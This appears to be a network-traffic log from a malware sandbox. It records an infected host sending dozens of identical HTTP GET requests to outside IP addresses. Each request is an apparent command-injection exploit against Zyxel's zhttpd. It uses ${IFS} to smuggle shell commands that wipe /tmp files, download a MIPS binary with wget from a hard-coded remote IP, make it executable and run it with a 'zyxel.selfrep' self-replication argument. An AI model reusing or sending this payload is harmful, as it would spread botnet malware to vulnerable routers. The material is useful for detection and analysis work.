                                    Jan 13, 2024 19:02:33.151678085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4090192.168.2.133550096.81.175.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151721001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4091192.168.2.1353800217.33.203.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151760101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4092192.168.2.136009498.170.157.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151813984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4093192.168.2.135735051.249.57.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151838064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4094192.168.2.1358668185.148.15.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151905060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4095192.168.2.135103258.148.193.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151925087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4096192.168.2.1333910135.148.248.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151969910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4097192.168.2.1342704116.94.202.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152000904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4098192.168.2.13525202.249.166.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152034044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4099192.168.2.1354794183.109.58.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152060032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4100192.168.2.1343954123.138.67.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152117968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4101192.168.2.1358554209.208.253.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152167082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4102192.168.2.13443824.87.143.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152185917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4103192.168.2.135021247.107.179.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152232885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4104192.168.2.1350074160.4.152.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152260065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4105192.168.2.13540165.17.138.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152311087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4106192.168.2.1336694180.152.117.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152339935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4107192.168.2.1344284137.86.219.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152363062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4108192.168.2.135859277.243.43.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152420998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4109192.168.2.135144288.139.43.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152465105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4110192.168.2.133900861.91.46.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152493954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4111192.168.2.1356940182.229.48.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152549028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4112192.168.2.133378478.251.166.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152581930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4113192.168.2.136054874.209.162.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152620077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4114192.168.2.1338128142.1.30.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152645111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4115192.168.2.1345856124.200.243.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152678013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4116192.168.2.133458885.181.90.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152729034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4117192.168.2.134122420.113.3.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152767897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4118192.168.2.13374925.223.108.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152806044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4119192.168.2.135348062.49.172.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152833939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4120192.168.2.133537041.36.19.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152868986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4121192.168.2.13530009.47.173.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152910948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4122192.168.2.133483697.57.9.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152935982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4123192.168.2.134603234.10.234.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.152971983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4124192.168.2.1346434166.154.139.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153023958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4125192.168.2.1355506128.118.151.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153057098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4126192.168.2.1342276216.222.216.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153101921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4127192.168.2.135917451.244.58.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153135061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4128192.168.2.133475677.189.67.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153179884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4129192.168.2.134996274.182.249.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153203964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4130192.168.2.1334744220.241.127.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153237104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4131192.168.2.1336360205.152.113.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153300047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4132192.168.2.1349388135.2.200.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153331041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4133192.168.2.13459228.103.60.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153357983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4134192.168.2.1357658186.124.190.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153404951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4135192.168.2.1360750193.207.82.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153470993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4136192.168.2.1335674165.105.80.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153482914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4137192.168.2.1351740110.180.161.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153520107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4138192.168.2.1342234173.211.133.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153559923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4139192.168.2.133595293.214.19.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153597116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4140192.168.2.1334418138.242.10.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153604984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4141192.168.2.134138470.0.215.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153645992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4142192.168.2.135581863.184.78.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153691053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4143192.168.2.134958069.166.105.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153728962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4144192.168.2.135687064.72.65.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153757095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4145192.168.2.135405063.166.6.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153810978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4146192.168.2.134490237.9.207.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153810978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4147192.168.2.1334308121.32.233.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153863907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4148192.168.2.135522468.136.134.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153918028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4149192.168.2.1360460177.140.216.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153950930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4150192.168.2.1346566138.175.211.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.153986931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4151192.168.2.133780632.8.203.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154047012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4152192.168.2.1334842106.103.227.166443
                                    TimestampBytes transferredDirectionData
